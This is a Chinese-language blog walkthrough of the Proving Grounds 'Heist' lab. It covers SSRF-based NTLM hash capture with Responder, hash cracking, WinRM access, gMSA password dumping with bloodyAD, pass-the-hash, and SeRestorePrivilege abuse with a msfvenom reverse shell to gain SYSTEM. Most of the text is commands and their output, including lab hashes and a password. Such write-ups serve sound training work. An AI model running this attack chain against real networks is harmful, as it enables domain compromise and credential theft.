临渊羡鱼

退而结网

0%

Proving Grounds Practice - Heist

Posted on In , , , Views: 6
Proving Grounds Practice Lab中Heist打靶过程记录

Difficulty

Hard

Scan

autorecon 192.168.149.165

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
[*] domain found on tcp/53.
    dns domain

[*] kerberos-sec found on tcp/88.
    kerberos-sec


[*] msrpc found on tcp/135.

[*] netbios-ssn found on tcp/139.

[*] ldap found on tcp/389. / 3268 
    heist.offsec
    rootDomainNamingContext: DC=heist,DC=offsec
|   ldapServiceName: heist.offsec:dc01$@HEIST.OFFSEC

[*] microsoft-ds found on tcp/445.
    SMB 3.0


[*] kpasswd5 found on tcp/464.

[*] ncacn_http found on tcp/593.

[*] ms-wbt-server found on tcp/3389.
    commonName=DC01.heist.offsec


[*] http found on tcp/8080.
    Server: Werkzeug/2.0.1 Python/3.9.0

    ssrf
    http://192.168.149.165:8080/?url=http://localhost:8080


[*] tcpwrapped found on tcp/636.

[*] tcpwrapped found on tcp/3269.

[*] wsman found on tcp/5985.
    WinRM


[*] mc-nmf found on tcp/9389.

[*] msrpc found on tcp/49666.
[*] msrpc found on tcp/49667.
[*] ncacn_http found on tcp/49673.
[*] msrpc found on tcp/49674.
[*] msrpc found on tcp/49677
[*] msrpc found on tcp/49704.
[*] msrpc found on tcp/49786.

[*] domain found on udp/53.

[*] kerberos-sec found on udp/88.

[*] ntp found on udp/123.

domain dig

首先添加heist.offsec和dc1.heist.offsec到 /etc/hosts中,

1
2
3
4
5
6
dig @192.168.149.165 AXFR heist.offsec

; <<>> DiG 9.20.2-1-Debian <<>> @192.168.149.165 AXFR heist.offsec
; (1 server found)
;; global options: +cmd
; Transfer failed.

rpcclient

1
2
rpcclient 192.168.149.165 -N
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE

smbclient

1
2
3
smbclient -L //192.168.149.165 -N
session setup failed: NT_STATUS_ACCESS_DENIED

ldapsearch

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
ldapsearch -H ldap://192.168.149.165 -x -b "DC=offsec,DC=heist" |tee ldap_dump
# extended LDIF
#
# LDAPv3
# base <DC=offsec,DC=heist> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4563

# numResponses: 1

8080

whatweb

1
2
3
whatweb -a 3 http://192.168.149.165:8080
http://192.168.149.165:8080 [200 OK] Bootstrap[3.3.6], Country[RESERVED][ZZ], HTML5, HTTPServer[Werkzeug/2.0.1 Python/3.9.0], IP[192.168.149.165], JQuery[2.2.2], Python[3.9.0], Script, Title[Super Secure Web Browser], Werkzeug[2.0.1]

gobuster

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://192.168.149.165:8080 -t 40
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.149.165:8080
[+] Method:                  GET
[+] Threads:                 40
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 20469 / 20470 (100.00%)
===============================================================
Finished
===============================================================

ssrf vuln

访问 http://192.168.149.165:8080/页面如下,只有一个输入框,提示输入一个url, 输入 http://192.168.149.165:8080/

还是同一个页面,确定是ssrf漏洞.

Foothold

截止目前我们还没有得到任何和用户相关的信息,如果可以窃取到NTLMV2 hash的话,就有了突破口,接下来使用 responder窃取handshake时的hash

kali启动responser, 输入框内输入kali的80端口地址 http://192.168.45.165/, 获取到了 NTLM V2 hash

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
sudo responder -I tun0 -wv
[sudo] password for kali: 
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.5.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
....

[+] Listening for events...

[!] Error starting TCP server on port 3389, check permissions or other servers running.
[HTTP] Sending NTLM authentication request to 192.168.149.165
[HTTP] GET request from: ::ffff:192.168.149.165  URL: / 
[HTTP] NTLMv2 Client   : 192.168.149.165
[HTTP] NTLMv2 Username : HEIST\enox
[HTTP] NTLMv2 Hash     : enox::HEIST:c22b3ec3fb2f7638:2F5E57D00CCDFDF244D34A4A120C58F9:0101000000000000D2CF76FF388CDB01ED4B9EE32A689CD900000000020008004A004E003300460001001E00570049004E002D005200440055004200540058005A005000390049004500040014004A004E00330046002E004C004F00430041004C0003003400570049004E002D005200440055004200540058005A0050003900490045002E004A004E00330046002E004C004F00430041004C00050014004A004E00330046002E004C004F00430041004C00080030003000000000000000000000000030000098BF0D68BEA36AC69F27F02B4B5580B35A970EAA12F2C2D466BA29E944A8C58C0A001000000000000000000000000000000000000900260048005400540050002F003100390032002E003100360038002E00340035002E003100360035000000000000000000

既然有了hash,接下来就是破解了 hashcat -m 5600 enox.hash /usr/share/wordlist/rockyou.txt, 得到密码 enox:california

接下来使用密码通过3389登录rdp, 登录失败

1
2
3
4
5
6
7
8
xfreerdp +clipboard /u:enox /p:california /v:192.168.149.165 /d:heist.offsec
[00:07:24:582] [2881148:2881151] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[00:07:24:582] [2881148:2881151] [WARN][com.freerdp.crypto] - CN = DC01.heist.offsec
[00:07:24:200] [2881148:2881151] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 104: Connection reset by peer
[00:07:24:200] [2881148:2881151] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[00:07:26:808] [2881148:2881151] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 104: Connection reset by peer
[00:07:26:808] [2881148:2881151] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[00:07:26:808] [2881148:2881151] [ERROR][com.freerdp.core] - freerdp_post_connect failed

登录smb,没有得到什么有用信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
smbclient -L //192.168.149.165 -U enox
Password for [WORKGROUP\enox]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.149.165 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
                                     
smbclient //192.168.149.165/netlogon -U enox
Password for [WORKGROUP\enox]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Jul 20 19:01:21 2021
  ..                                  D        0  Tue Jul 20 19:01:21 2021

                7706623 blocks of size 4096. 3249419 blocks available
smb: \> exit
                                                                                                                                             
smbclient //192.168.149.165/sysvol -U enox
Password for [WORKGROUP\enox]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Jul 20 19:01:21 2021
  ..                                  D        0  Tue Jul 20 19:01:21 2021
  heist.offsec                       Dr        0  Tue Jul 20 19:01:21 2021

                7706623 blocks of size 4096. 3249419 blocks available
smb: \> cd heist.offsec
smb: \heist.offsec\> ls
  .                                   D        0  Tue Jul 20 19:07:47 2021
  ..                                  D        0  Tue Jul 20 19:07:47 2021
  DfsrPrivate                      DHSr        0  Tue Jul 20 19:07:47 2021
  Policies                            D        0  Tue Jul 20 19:01:30 2021
  scripts                             D        0  Tue Jul 20 19:01:21 2021

evil-winrm 登录成功

1
2
3
4
5
6
7
8
9
10
11
evil-winrm -i 192.168.149.165 -u enox -p california
                                      
Evil-WinRM shell v3.5
                                      
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                      
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                      
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\enox\Documents> ls
*Evil-WinRM* PS C:\Users\enox\Documents> cd ..

Escalation

在enox/desktop文件夹下发现todo.txt

然后在/users 目录下发现有svc_apache$用户,可能是一个利用点

常规收集enox用户权限、运行进程、serivce都没有收货,运行winpeas一样没有得到提权有用的信息。不过既然是AD,就要上传SharpHound.ps1收集一下域相关信息

bloodhound

1
2
3
4
5
6
7
*Evil-WinRM* PS C:\users\enox> . .\sharphound.ps1
*Evil-WinRM* PS C:\users\enox> invoke-bloodhound -collectionmethod all -outputprefix "audit" -outputdirectory "/users/enox"
*Evil-WinRM* PS C:\Users\enox> download audit_20250303064734_BloodHound.zip
                                      
Info: Downloading C:\Users\enox\audit_20250303064734_BloodHound.zip to audit_20250303064734_BloodHound.zip
                                      
Info: Download successful!

ReadGMSAPassword

BloodHound 中看到enox用户所属WEB ADMINS有对SVC_APACH$有ReadGMSAPassword权限

“ReadGMSAPassword”通常指的是一种权限或能力,允许某个账户读取Active Directory中组管理服务账户(gMSA)的密码。gMSA是Windows Server 2012引入的一种特殊服务账户类型,用于自动化密码管理,广泛应用于域环境中的服务和应用程序。

gMSA的特点

密码由域控制器(DC)自动生成和管理(240字节随机密码)。

默认每30天自动轮换一次(可配置)。

允许多台主机使用同一账户运行服务,解决了传统MSA(Managed Service Account)只能绑定单机的限制。

密码存储在AD对象的 msDS-ManagedPassword 属性中。

ReadGMSAPassword 的含义

在AD中,gMSA的密码访问权限由 msDS-GroupMSAMembership 属性控制,该属性定义了哪些安全主体(用户、组或计算机)可以读取密码。

如果一个账户拥有“ReadGMSAPassword”权限(通常表现为 RIGHT_DS_READ_PROPERTY 访问控制权限),它可以提取gMSA的当前密码。

那么接下来就是获取svc_apache$的密码信息了

测试bloodhound中给出的gMSADumper.py, 执行后只是列出来who can read, 这些是我们已经知道的了。

1
2
3
4
5
6
7
python gMSADumper.py -u enox -p california -d heist.offsec
Unable to start a TLS connection. Is LDAPS enabled? Only ACLs will be listed and not ms-DS-ManagedPassword.

Users or groups who can read password for svc_apache$:
 > DC01$
 > Web Admins

搜索一下 readgmsa password找到下面的链接:

https://www.thehacker.recipes/ad/movement/dacl/readgmsapassword

bloodyAD: https://github.com/CravateRouge/bloodyAD

成功读取到ntlm hash:0c43e5ad6bc9104cfb94d56f4aecb4ab

1
2
3
4
5
6
./bloodyAD.py --host 192.168.149.165 -d heist.offsec -u enox -p california get object svc_apache$ --attr msDS-ManagedPassword

distinguishedName: CN=svc_apache,CN=Managed Service Accounts,DC=heist,DC=offsec
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:0c43e5ad6bc9104cfb94d56f4aecb4ab
msDS-ManagedPassword.B64ENCODED: b8iUgZTAehetubX0QcQQoLkmMSjGS7MXKpta94CcZvY4hej/0kCetCW0BVRtyfpubMbV/SECcA0VvsH2dvzZjsna1RLixNOQEedehbIpHdPFmvVcgwl30oBm2/+HJ8p0ox2VYjB/bjTx3VLiInMHzriTIlFLAL/j7feKC383nDPSpyUnfza62KJFYBHcQA//XGJ9rcl33pTN1IdYeEpzOcNzmca2QRdtIbBLpDTsRceO0qafC8a1yYkDtmfC1JmZxG9T3BopaW8Xl1Jjc1hTUDr9rAtGuUCSDCrTY50hI2B9HzkMXoAzPVz0L7amoE0X4QPNtGWDrM4+fg3//AUARw==

Pass The Hash

查看svc_apache$权限: SeRestorePrivilege

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
evil-winrm -i 192.168.149.165 -u "svc_apache$" -H "0c43e5ad6bc9104cfb94d56f4aecb4ab"
                                      
Evil-WinRM shell v3.5
                                      
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                      
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                      
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_apache$\Documents> ls


    Directory: C:\Users\svc_apache$\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/14/2021   8:27 AM           3213 EnableSeRestorePrivilege.ps1


*Evil-WinRM* PS C:\Users\svc_apache$\Documents> whoami /priv


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

SeRestorPrivilege

SeRestorePrivilege 是 Windows 操作系统中的一种特权(Privilege),全称是 “Restore files and directories” (恢复文件和目录)。它属于安全特权的一部分,通常由系统管理员或高权限账户持有,用于执行涉及系统级恢复或修改的操作。

  • 通常授予 Administrators 组(本地管理员)。
  • 在域环境中,可能由 Domain Admins 或特定服务账户(如备份服务)持有。
  • 默认情况下,非管理员用户不具备此特权。

可以做什么:

  1. 绕过文件权限
  2. 无视文件或目录的ACL,直接写入或覆盖内容。
  3. 示例:即使文件只允许“SYSTEM”写入,拥有此特权的用户也能修改它。
  4. 修改注册表
  5. 包括受限的注册表键(如 HKEY_LOCAL_MACHINE\SAM、HKEY_LOCAL_MACHINE\SECURITY)。
  6. 可用于添加用户、修改权限等。
  7. 还原备份
  8. 与备份工具(如 Windows Server Backup)配合,恢复系统文件或数据。

简而言之: 拥有修改系统文件权限

利用SeRestoreAbuse.exe执行反弹shell, 成功得到管理员shell

SeRestoreAbuse:``https://github.com/dxnboy/redteam/blob/master/SeRestoreAbuse.exe

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.165 LPORT=443 -f exe -o r.exe

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
*Evil-WinRM* PS C:\Users\svc_apache$> upload SeRestoreAbuse.exe
                                      
Info: Uploading /home/kali/Tools/pg/Heist/SeRestoreAbuse.exe to C:\Users\svc_apache$\SeRestoreAbuse.exe
                                      
Data: 22528 bytes of 22528 bytes copied
                                      
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc_apache$> upload r.exe
                                      
Info: Uploading /home/kali/Tools/pg/Heist/r.exe to C:\Users\svc_apache$\r.exe
                                      
Data: 9556 bytes of 9556 bytes copied
                                      
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc_apache$> .\SeRestoreAbuse.exe C:\Users\svc_apache$\r.exe
RegCreateKeyExA result: 0
RegSetValueExA result: 0
SeRestoreAbuse.exe : start-service : Service 'Secondary Logon (seclogon)' cannot be started due to the following error: Cannot start 
1
2
3
4
5
6
7
8
9
rlwrap nc -nvlp 443
listening on [any] 443 ...
connect to [192.168.45.165] from (UNKNOWN) [192.168.149.165] 52353
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

Gitalk 加载中 ...